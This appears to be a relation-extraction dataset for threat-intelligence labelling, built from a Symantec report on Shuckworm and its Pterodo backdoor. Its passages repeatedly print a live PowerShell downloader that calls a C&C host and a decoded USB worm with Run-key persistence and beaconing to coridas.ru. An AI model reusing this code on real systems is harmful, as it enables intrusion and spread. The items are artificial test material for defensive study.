_$CHiLdS = GET-ChilDITem $drivE.nAMe_
_foReach($cHilDs IN $chiLDs)_
_{_
_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_
_{_
_sET-lnk $chILds.fUlLName_
_}}_
_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_
_SEt-lNK $DRivE.name_
_}}_
_STArt-SLEeP -S 300;_
_}_
This PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Pterodo
### Target Entity: Shuckworm
### Possible Relationship Labels:
['authored-by', 'is not related to', 'not sure']
### Text Passage:
Typical Attack Chain
The following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.
In one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.
After the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers’ C&C server:
`"CSIDL_SYSTEM\cmd.exe" /c start /min "" powershell -w hidden "$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text"`
More recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.
Shuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group’s scripts observed per month between January and April 2023.
Next, a VBS script, which was Shuckworm’s Pterodo backdoor, was executed:
* CSIDL_SYSTEM\wscript.exe CSIDL_PROFILE\appdata\local\temp\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model
Following this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.
On a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. "usb-накопитель" translates as "usb-drive".
The foto.safe file is a Base64-encoded script.
Decoded it looks like the following:
_fUNCtIon sET-lnK ($chILd) {_
_$nAMetxt = "foto.sAfe".TolowER();_
_$NAmE = ("кОМПРОМат", "КОРЗиНА", "СеКРетнО" GeT-rAnDOm).ToUPPeR();_
_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_
_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +"\$nAMe.LNK");_
_$shoRtCuT.iConloCaTiON = "C:\wiNDoWS\SysteM32\SHELL32.DLL,3";_
_$SHOrTcUT.TArGetpAth = "c:\wInDOwS\sYstEm32\WInDOwSpowERshell\V1.0\POwERShEll.ExE".ToLoweR();_
_$text = "-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\$NAMetxt OUT-STrIng))".TOlower();_
_$sHORTCUT.ArGUMEnTs = $tExt;_
_$sHortCUT.saVE();_
_$mYfIlE= $chIlD+"\$naMeTXT"_
_cOPY-Item $enV:UsErprOfilE\iNdEx.phP -deSTINAtION $mYfILE_
_$FIlE=GEt-ITEM $mYfiLE -forCe_
_$FiLe.ATtRiButes='hiDDEN'_
__
_}_
_Set-ITemPRoPERTY -pAth HkCU:\soFTWare\MicROsOfT\WiNDows\cURRENtVerSiON\ruN -NAME safE -valUE $env:windir'\sYSTeM32\wINDoWSPowErSHEll\v1.0\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_
_coPy-item .\"fOtO.safe" -dEsTInaTioN $Env:USeRprOFIle\iNdEX.pHp_
_WHile($CoUNT -lE 2){_
_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_
_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_
_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer "drIvETYPe='2'";_
_$Drive.naMe FOreaCH-oBJecT{_
_$CHiLdS = GET-ChilDITem $drivE.nAMe_
_foReach($cHilDs IN $chiLDs)_
_{_
_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_
_{_
_sET-lnk $chILds.fUlLName_
_}}_
_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_
_SEt-lNK $DRivE.name_
_}}_
_STArt-SLEeP -S 300;_
_}_
This PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.
|
<label>authored-by</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Shuckworm
### Target Entity: C&C
### Possible Relationship Labels:
['uses', 'hosts', 'owns', 'compromises', 'is not related to', 'not sure']
### Text Passage:
Typical Attack Chain
The following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.
In one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.
After the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers’ C&C server:
`"CSIDL_SYSTEM\cmd.exe" /c start /min "" powershell -w hidden "$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text"`
More recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.
Shuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group’s scripts observed per month between January and April 2023.
Next, a VBS script, which was Shuckworm’s Pterodo backdoor, was executed:
* CSIDL_SYSTEM\wscript.exe CSIDL_PROFILE\appdata\local\temp\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model
Following this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.
On a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. "usb-накопитель" translates as "usb-drive".
The foto.safe file is a Base64-encoded script.
Decoded it looks like the following:
_fUNCtIon sET-lnK ($chILd) {_
_$nAMetxt = "foto.sAfe".TolowER();_
_$NAmE = ("кОМПРОМат", "КОРЗиНА", "СеКРетнО" GeT-rAnDOm).ToUPPeR();_
_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_
_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +"\$nAMe.LNK");_
_$shoRtCuT.iConloCaTiON = "C:\wiNDoWS\SysteM32\SHELL32.DLL,3";_
_$SHOrTcUT.TArGetpAth = "c:\wInDOwS\sYstEm32\WInDOwSpowERshell\V1.0\POwERShEll.ExE".ToLoweR();_
_$text = "-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\$NAMetxt OUT-STrIng))".TOlower();_
_$sHORTCUT.ArGUMEnTs = $tExt;_
_$sHortCUT.saVE();_
_$mYfIlE= $chIlD+"\$naMeTXT"_
_cOPY-Item $enV:UsErprOfilE\iNdEx.phP -deSTINAtION $mYfILE_
_$FIlE=GEt-ITEM $mYfiLE -forCe_
_$FiLe.ATtRiButes='hiDDEN'_
__
_}_
_Set-ITemPRoPERTY -pAth HkCU:\soFTWare\MicROsOfT\WiNDows\cURRENtVerSiON\ruN -NAME safE -valUE $env:windir'\sYSTeM32\wINDoWSPowErSHEll\v1.0\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_
_coPy-item .\"fOtO.safe" -dEsTInaTioN $Env:USeRprOFIle\iNdEX.pHp_
_WHile($CoUNT -lE 2){_
_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_
_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_
_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer "drIvETYPe='2'";_
_$Drive.naMe FOreaCH-oBJecT{_
_$CHiLdS = GET-ChilDITem $drivE.nAMe_
_foReach($cHilDs IN $chiLDs)_
_{_
_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_
_{_
_sET-lnk $chILds.fUlLName_
_}}_
_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_
_SEt-lNK $DRivE.name_
_}}_
_STArt-SLEeP -S 300;_
_}_
This PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.
|
<label>owns</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Pterodo
### Target Entity: C&C
### Possible Relationship Labels:
['beacons-to', 'exfiltrates-to', 'targets', 'uses', 'is not related to', 'not sure']
### Text Passage:
Typical Attack Chain
The following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.
In one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.
After the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers’ C&C server:
`"CSIDL_SYSTEM\cmd.exe" /c start /min "" powershell -w hidden "$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text"`
More recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.
Shuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group’s scripts observed per month between January and April 2023.
Next, a VBS script, which was Shuckworm’s Pterodo backdoor, was executed:
* CSIDL_SYSTEM\wscript.exe CSIDL_PROFILE\appdata\local\temp\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model
Following this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.
On a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. "usb-накопитель" translates as "usb-drive".
The foto.safe file is a Base64-encoded script.
Decoded it looks like the following:
_fUNCtIon sET-lnK ($chILd) {_
_$nAMetxt = "foto.sAfe".TolowER();_
_$NAmE = ("кОМПРОМат", "КОРЗиНА", "СеКРетнО" GeT-rAnDOm).ToUPPeR();_
_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_
_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +"\$nAMe.LNK");_
_$shoRtCuT.iConloCaTiON = "C:\wiNDoWS\SysteM32\SHELL32.DLL,3";_
_$SHOrTcUT.TArGetpAth = "c:\wInDOwS\sYstEm32\WInDOwSpowERshell\V1.0\POwERShEll.ExE".ToLoweR();_
_$text = "-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\$NAMetxt OUT-STrIng))".TOlower();_
_$sHORTCUT.ArGUMEnTs = $tExt;_
_$sHortCUT.saVE();_
_$mYfIlE= $chIlD+"\$naMeTXT"_
_cOPY-Item $enV:UsErprOfilE\iNdEx.phP -deSTINAtION $mYfILE_
_$FIlE=GEt-ITEM $mYfiLE -forCe_
_$FiLe.ATtRiButes='hiDDEN'_
__
_}_
_Set-ITemPRoPERTY -pAth HkCU:\soFTWare\MicROsOfT\WiNDows\cURRENtVerSiON\ruN -NAME safE -valUE $env:windir'\sYSTeM32\wINDoWSPowErSHEll\v1.0\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_
_coPy-item .\"fOtO.safe" -dEsTInaTioN $Env:USeRprOFIle\iNdEX.pHp_
_WHile($CoUNT -lE 2){_
_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_
_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_
_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer "drIvETYPe='2'";_
_$Drive.naMe FOreaCH-oBJecT{_
_$CHiLdS = GET-ChilDITem $drivE.nAMe_
_foReach($cHilDs IN $chiLDs)_
_{_
_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_
_{_
_sET-lnk $chILds.fUlLName_
_}}_
_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_
_SEt-lNK $DRivE.name_
_}}_
_STArt-SLEeP -S 300;_
_}_
This PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Shuckworm
### Target Entity: Pterodo
### Possible Relationship Labels:
['uses', 'is not related to', 'not sure']
### Text Passage:
Typical Attack Chain
The following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.
In one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.
After the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers’ C&C server:
`"CSIDL_SYSTEM\cmd.exe" /c start /min "" powershell -w hidden "$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text"`
More recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.
Shuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group’s scripts observed per month between January and April 2023.
Next, a VBS script, which was Shuckworm’s Pterodo backdoor, was executed:
* CSIDL_SYSTEM\wscript.exe CSIDL_PROFILE\appdata\local\temp\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model
Following this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.
On a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. "usb-накопитель" translates as "usb-drive".
The foto.safe file is a Base64-encoded script.
Decoded it looks like the following:
_fUNCtIon sET-lnK ($chILd) {_
_$nAMetxt = "foto.sAfe".TolowER();_
_$NAmE = ("кОМПРОМат", "КОРЗиНА", "СеКРетнО" GeT-rAnDOm).ToUPPeR();_
_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_
_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +"\$nAMe.LNK");_
_$shoRtCuT.iConloCaTiON = "C:\wiNDoWS\SysteM32\SHELL32.DLL,3";_
_$SHOrTcUT.TArGetpAth = "c:\wInDOwS\sYstEm32\WInDOwSpowERshell\V1.0\POwERShEll.ExE".ToLoweR();_
_$text = "-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\$NAMetxt OUT-STrIng))".TOlower();_
_$sHORTCUT.ArGUMEnTs = $tExt;_
_$sHortCUT.saVE();_
_$mYfIlE= $chIlD+"\$naMeTXT"_
_cOPY-Item $enV:UsErprOfilE\iNdEx.phP -deSTINAtION $mYfILE_
_$FIlE=GEt-ITEM $mYfiLE -forCe_
_$FiLe.ATtRiButes='hiDDEN'_
__
_}_
_Set-ITemPRoPERTY -pAth HkCU:\soFTWare\MicROsOfT\WiNDows\cURRENtVerSiON\ruN -NAME safE -valUE $env:windir'\sYSTeM32\wINDoWSPowErSHEll\v1.0\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_
_coPy-item .\"fOtO.safe" -dEsTInaTioN $Env:USeRprOFIle\iNdEX.pHp_
_WHile($CoUNT -lE 2){_
_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_
_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_
_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer "drIvETYPe='2'";_
_$Drive.naMe FOreaCH-oBJecT{_
_$CHiLdS = GET-ChilDITem $drivE.nAMe_
_foReach($cHilDs IN $chiLDs)_
_{_
_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_
_{_
_sET-lnk $chILds.fUlLName_
_}}_
_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_
_SEt-lNK $DRivE.name_
_}}_
_STArt-SLEeP -S 300;_
_}_
This PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192
### Target Entity: Malicious documents
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
**Malicious documents**
* f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192
* 31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b
* c62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30
* c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8
* 3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137
* 3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601
* acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8
**USB propagation scripts**
* 28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01
* 2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581
* dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87
* a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5
* 91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86
**Example of LNK files created**
* 7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b
### Target Entity: Malicious documents
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
**Malicious documents**
* f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192
* 31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b
* c62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30
* c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8
* 3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137
* 3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601
* acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8
**USB propagation scripts**
* 28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01
* 2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581
* dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87
* a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5
* 91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86
**Example of LNK files created**
* 7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
c62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30
### Target Entity: Malicious documents
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
**Malicious documents**
* f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192
* 31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b
* c62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30
* c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8
* 3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137
* 3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601
* acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8
**USB propagation scripts**
* 28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01
* 2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581
* dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87
* a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5
* 91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86
**Example of LNK files created**
* 7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8
### Target Entity: Malicious documents
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
**Malicious documents**
* f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192
* 31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b
* c62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30
* c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8
* 3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137
* 3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601
* acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8
**USB propagation scripts**
* 28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01
* 2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581
* dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87
* a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5
* 91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86
**Example of LNK files created**
* 7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8
### Target Entity: Malicious documents
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
**Malicious documents**
* f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192
* 31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b
* c62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30
* c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8
* 3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137
* 3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601
* acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8
**USB propagation scripts**
* 28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01
* 2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581
* dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87
* a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5
* 91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86
**Example of LNK files created**
* 7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137
### Target Entity: Malicious documents
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
**Malicious documents**
* f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192
* 31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b
* c62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30
* c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8
* 3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137
* 3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601
* acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8
**USB propagation scripts**
* 28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01
* 2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581
* dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87
* a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5
* 91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86
**Example of LNK files created**
* 7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601
### Target Entity: Malicious documents
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
**Malicious documents**
